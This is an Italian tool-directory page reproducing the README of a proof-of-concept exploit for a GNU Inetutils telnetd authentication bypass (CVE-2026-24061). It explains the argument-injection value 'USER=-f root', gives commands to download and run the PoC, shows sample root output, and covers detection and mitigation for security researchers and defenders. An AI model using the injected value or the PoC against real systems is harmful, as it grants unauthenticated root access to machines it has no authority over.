Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-24061-Telnetd — CVE-2026-24061 Bypass dell'autenticazione di Telnetd GNU Inetutils | Kitploit
Strumenti/GitHubGitHub/ish3ng0m4/cve-2026-24061-telnetd
Analisi delle VulnerabilitàExploitPenetration TestingAutenticazioneApprendimento e FormazioneStrumento di Accesso Remoto
GitHubish3ng0m4/cve-2026-24061-telnetd

CVE-2026-24061-Telnetd

CVE-2026-24061 Bypass dell'autenticazione di Telnetd GNU Inetutils

Vedi Repository
6h 1m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-24061
Bypass dell'autenticazione in GNU Inetutils Telnetd

CVE: CVE-2026-24061
Gravità: Critica
CVSS: 9.8 (Critico)
CWE: CWE-88 — Neutralizzazione impropria dei delimitatori di argomento in un comando
Componente interessato: GNU Inetutils telnetd
Versioni interessate: dalla 1.9.3 alla 2.7

Panoramica

CVE-2026-24061 è una vulnerabilità critica di bypass dell'autenticazione nell'implementazione del server Telnet fornita da GNU Inetutils. La vulnerabilità ha origine dalla validazione insufficiente della variabile d'ambiente USER controllata dal client quando il login automatico Telnet è abilitato. Un valore dannoso può essere interpretato come un'opzione per il programma di login di sistema anziché come nome utente. In configurazioni vulnerabili, un attaccante remoto non autenticato può abusare di questo comportamento per invocare login con l'opzione -f e bypassare l'autenticazione, ottenendo potenzialmente una shell con i privilegi dell'account richiesto.

Quando il servizio Telnet interessato viene eseguito con privilegi di root, lo sfruttamento riuscito può comportare accesso root remoto non autenticato.

Descrizione Tecnica

Il flusso di esecuzione vulnerabile può essere riassunto come:

root@kitploit:~
 Client Telnet
      │
      │ USER=-f root
      ▼
    telnetd
      │
      │ costruisce gli argomenti di login
      ▼
 login -f root
      │
      │ bypass dell'autenticazione
      ▼
 shell root

Il problema viene innescato attraverso l'interazione tra la funzionalità di login automatico di Telnet e la gestione della variabile d'ambiente USER.

Il valore controllato dall'attaccante:

root@kitploit:~
 -f root

non viene trattato strettamente come nome utente. Invece, può diventare un argomento per login, risultando in un comportamento equivalente a:

root@kitploit:~
 login -f root

L'opzione -f istruisce login a bypassare il normale processo di autenticazione per l'utente specificato.

Proof of Concept PoC

Il repository include una proof of concept in Python 3 che esegue la connessione Telnet, gestisce la necessaria negoziazione del protocollo, inietta il valore USER dannoso e verifica la sessione risultante.

Clonare il repository (Consigliato)

root@kitploit:~
 git clone https://github.com/Ish3ng0m4/CVE-2026-24061-Telnetd.git
 cd CVE-2026-24061-Telnetd
 chmod +x poc.py
 python3 poc.py <TARGET> <PORT>

Scaricare solo poc.py

root@kitploit:~
 wget https://raw.githubusercontent.com/Ish3ng0m4/CVE-2026-24061-Telnetd/main/poc.py

Utilizzo

Rendere eseguibile il PoC:

root@kitploit:~
 chmod +x poc.py

Eseguirlo fornendo l'indirizzo del target e la porta Telnet:

root@kitploit:~
 python3 poc.py <TARGET> <PORT>

Esempio:

root@kitploit:~
 python3 poc.py 127.0.0.1 23

Sfruttamento riuscito

Un target vulnerabile produce un output simile a:

CVE-2026-24061 - Bypass Auth GNU Inetutils telnetd

root@kitploit:~
 [*] Target: 127.0.0.1:23
 [+] Connesso
 [*] Iniettato USER=-f root
 
 [+] VULNERABILE

Il PoC fornisce quindi una sessione interattiva.

L'escalation dei privilegi può essere confermata con:

root@kitploit:~
 id

Risultato atteso:

root@kitploit:~
 uid=0(root) gid=0(root) groups=0(root)

Questo conferma che il meccanismo di autenticazione Telnet è stato bypassato e la sessione risultante ha privilegi di root.

Flusso di Lavoro del PoC

L'exploit esegue le seguenti operazioni:

Si connette al servizio Telnet del target. Esegue la negoziazione del protocollo Telnet richiesta. Abilita il comportamento di login automatico necessario per lo sfruttamento. Fornisce il valore dannoso USER=-f root. Consente all'implementazione vulnerabile di telnetd di passare il valore manipolato a login. Riceve la sessione risultante. Fornisce un terminale interattivo all'operatore.

Il PoC non si basa su credenziali per il percorso di autenticazione vulnerabile.

Configurazioni Interessate

Lo sfruttamento dipende dalla configurazione del target e dall'interazione tra telnetd e l'implementazione di login del sistema.

Le condizioni principali sono:

GNU Inetutils telnetd nell'intervallo di versioni interessate.
Servizio Telnet accessibile all'attaccante.
Funzionalità di login automatico abilitata o disponibile.
Gestione vulnerabile della variabile d'ambiente USER.
Un'implementazione di login compatibile in grado di interpretare l'opzione iniettata.

Di conseguenza, la presenza di una versione Inetutils interessata da sola non dovrebbe essere trattata come prova di sfruttabilità. Anche le patch delle distribuzioni e la configurazione del servizio devono essere considerate.

Impatto

CVE-2026-24061 può compromettere completamente un sistema vulnerabile.

A seconda dei privilegi con cui opera telnetd, lo sfruttamento può fornire:

Bypass dell'autenticazione
Accesso non autorizzato ad account locali
Esecuzione remota di comandi
Escalation dei privilegi
Accesso a livello root
Compromissione completa del sistema

Lo scenario a rischio più elevato è un servizio Telnet accessibile da remoto in cui lo sfruttamento risulta in una sessione root.

Rilevamento

I potenziali indicatori di sfruttamento includono:

Connessioni inattese a TCP/23.
Tentativi di autenticazione Telnet che utilizzano nomi utente insoliti.
Valori USER sospetti che iniziano con opzioni della riga di comando.
Argomenti di processo login inattesi.
Sessioni root originate da telnetd.
Processi inattesi generati dal servizio Telnet.

Il monitoraggio della rete dovrebbe anche identificare i sistemi che espongono inutilmente servizi Telnet.

Mitigazione

La risposta consigliata è rimuovere Telnet e utilizzare SSH per l'amministrazione remota.

Se Telnet non può essere rimosso immediatamente:

Aggiornare a una versione fornita dal vendor che contenga la correzione di sicurezza.
Applicare l'appropriato aggiornamento di sicurezza del sistema operativo.
Limitare TCP/23 alle reti di gestione fidate.
Impedire l'esposizione diretta di Telnet a reti non fidate.
Monitorare l'autenticazione Telnet e l'attività dei processi.

Poiché le distribuzioni Linux possono applicare backport delle correzioni di sicurezza senza modificare il numero di versione upstream, gli amministratori dovrebbero verificare lo stato di sicurezza del pacchetto della propria distribuzione anziché fare affidamento esclusivamente sulla versione visualizzata.

Validazione

La vulnerabilità è stata riprodotta con successo contro un servizio Telnet GNU Inetutils vulnerabile in esecuzione su Ubuntu 22.04.5 LTS.

Il PoC ha stabilito una connessione a TCP/23, ha iniettato:

root@kitploit:~
 USER=-f root

e ha ottenuto una sessione root.

La verifica dei privilegi ha restituito:

root@kitploit:~
 uid=0(root) gid=0(root) groups=0(root)

Questo fornisce una conferma diretta dell'impatto sulla sicurezza.

Disclaimer

Questa proof of concept è fornita per ricerca sulla sicurezza, validazione di vulnerabilità, test di penetrazione autorizzati e scopi educativi.

Testare solo sistemi per i quali si dispone di autorizzazione esplicita.

Gabriel D. Ishengoma
Offensive Security · Ricerca sulla Cybersecurity · Digital Forensics

Scarica lo strumento